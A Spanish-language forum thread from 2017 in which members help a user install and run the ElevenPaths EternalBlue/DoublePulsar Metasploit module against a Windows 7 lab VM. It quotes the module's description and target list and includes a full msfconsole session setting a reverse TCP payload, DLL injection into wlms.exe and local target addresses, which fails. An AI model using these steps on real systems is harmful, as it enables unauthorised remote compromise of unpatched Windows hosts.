[SOLUCIONADO] exploit eternal blue y carpeta deps

Iniciado por redferne, Junio 20, 2017, 09:34:34 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 20, 2017, 09:34:34 AM Ultima modificación: Junio 20, 2017, 11:16:38 AM por HATI
saludos:
he descargado el exploit eternalblue_doblepulsar de github, lo he metido en esta ruta

/root/.msf4/modules/exploits/local/windows/eternalblue (esta es la carpeta descargada que la he renombrado a eternalblue no se si he hecho mal.....)

las carpetas "exploits local y windows" las he creado yo para llevar un poco de orden......el caso es que dentro de dicha carpeta esta tambien la carpeta
"deps" y mi pregunta es si esa es la ubicacion correcta ?
Junio 20, 2017, 10:15:39 AM #1 Ultima modificación: Junio 20, 2017, 08:40:13 PM por xyz
Mirate este link:
Código: php
http://foro.elhacker.net/bugs_y_exploits/vulnerar_windows_7_con_eternalblue_doublepulsar-t471204.0.html

Lo siento, no contesto dudas por MP, si tienes dudas las planteas en el foro.
Junio 20, 2017, 10:42:13 AM #2 Ultima modificación: Junio 20, 2017, 08:40:41 PM por xyz
El modulo oficial de metasploit es el siguiente
Código: php
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
, si tienes tu equipo con las actualizaciones al día ya deberias de tenerlo

Saludos,
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 20, 2017, 12:13:30 PM #3
El modulo oficial solo sirve para windows7 y windows 8 server. El del github sirve para todas las versiones. Por eso se desea instalar la versión de elevenPaths.

Lo siento, no contesto dudas por MP, si tienes dudas las planteas en el foro.
Junio 20, 2017, 04:11:39 PM #4
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, no, el exploit de ElevenPahts no funciona en Windows 10:

Cita de:  eternalblue_doublepulsar.rb'Description' => %q{
          This module exploits a vulnerability on SMBv1/SMBv2 protocols through Eternalblue.
     After that, doublepulsar is used to inject remotely a malicious dll (it's will generate based on your      payload selection).
     You can use this module to compromise a host remotely (among the targets available) without needing         nor authentication neither target's user interaction.
     ** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, IT'S NOT THE FULL PORTATION **
      },
      'Author'      =>
        [
          'Pablo Gonzalez (@pablogonzalezpe)',
          'Sheila A. Berta (@UnaPibaGeek)'
        ],
      'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      'DefaultTarget'  => 8,
      'Targets'        =>
        [
     ['Windows XP (all services pack) (x86) (x64)',{}],
     ['Windows Server 2003 SP0 (x86)',{}],
     ['Windows Server 2003 SP1/SP2 (x86)',{}],
     ['Windows Server 2003 (x64)',{}],
          ['Windows Vista (x86)',{}],
     ['Windows Vista (x64)',{}],
     ['Windows Server 2008 (x86) ',{}],
     ['Windows Server 2008 R2 (x86) (x64)',{}],
     ['Windows 7 (all services pack) (x86) (x64)',{}]
],


De todas formas ya se ha portado el exploit para Win 10, aquí dejo el paper oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Jugar o perder
Junio 20, 2017, 05:34:27 PM #5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El modulo oficial solo sirve para windows7 y windows 8 server. El del github sirve para todas las versiones. Por eso se desea instalar la versión de elevenPaths.

Windows 8 server?   ??? ???

Sirve hasta para windows 7 y Windows Server 2008 el de ElevenPaths y hay  otro por ahi que sirve para win 8 y windows server 2012 pero no tiene integracion con metasploit (No hay modulo)
Junio 20, 2017, 05:38:42 PM #6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, no, el exploit de ElevenPahts no funciona en Windows 10:

Antes muerto que admitir que windows 10 es un windows!!!!!!!

:P Nas, no sabia que no iba en win 10, pero si que es cierto que abre el espectro de versiones notablemente.

Lo siento, no contesto dudas por MP, si tienes dudas las planteas en el foro.
Junio 20, 2017, 05:42:54 PM #7
Solo vean esto y ya.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 20, 2017, 06:35:50 PM #8 Ultima modificación: Junio 20, 2017, 06:37:34 PM por redferne
no se si abrir otro post..... pero como va de lo mismo.....
hago todo esto pero no funciona

Código: text

       =[ metasploit v4.14.22-dev                         ]
+ -- --=[ 1660 exploits - 947 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf> use windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set eternalbluepath /root/Desktop/eternalblue/deps/
eternalbluepath => /root/Desktop/eternalblue/deps/
msf exploit(eternalblue_doublepulsar) > set doublepulsarpath /root/Desktop/eternalblue/deps/
doublepulsarpath => /root/Desktop/eternalblue/deps/
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x86
targetarchitecture => x86
msf exploit(eternalblue_doublepulsar) > set process inject wlms.exe
process => inject wlms.exe
msf exploit(eternalblue_doublepulsar) > set lhost 192.168.0.193
lhost => 192.168.0.193
msf exploit(eternalblue_doublepulsar) > set lport 8008
lport => 8008
msf exploit(eternalblue_doublepulsar) > set rhost 192.168.0.194
rhost => 192.168.0.194
msf exploit(eternalblue_doublepulsar) > set winepath /root/.wine/drive_c/
winepath => /root/.wine/drive_c/
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.0.193:8008 
[*] 192.168.0.194:445 - Generating Eternalblue XML data
[*] 192.168.0.194:445 - Generating Doublepulsar XML data
[*] 192.168.0.194:445 - Generating payload DLL for Doublepulsar
[*] 192.168.0.194:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.0.194:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.0.194:445 - Are you sure it's vulnerable?
[*] 192.168.0.194:445 - Launching Doublepulsar...
[-] 192.168.0.194:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >


por descontado que el puerto esta abierto a la ip 192.168.0.193

el w7 es ultimate 32bits y tanto kali como w7 corren en vbox en la mima red kali 2016.2
w7 ip 192.168.0.194
kali ip 192.168.0.193 con el puerto 8008 abierto en el router
Junio 20, 2017, 06:40:34 PM #9
Hola. @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Mira este vídeo. Explican como instalar eternal blue y como se explota






Imprimir
Ir Arriba Páginas1
Acciones del Usuario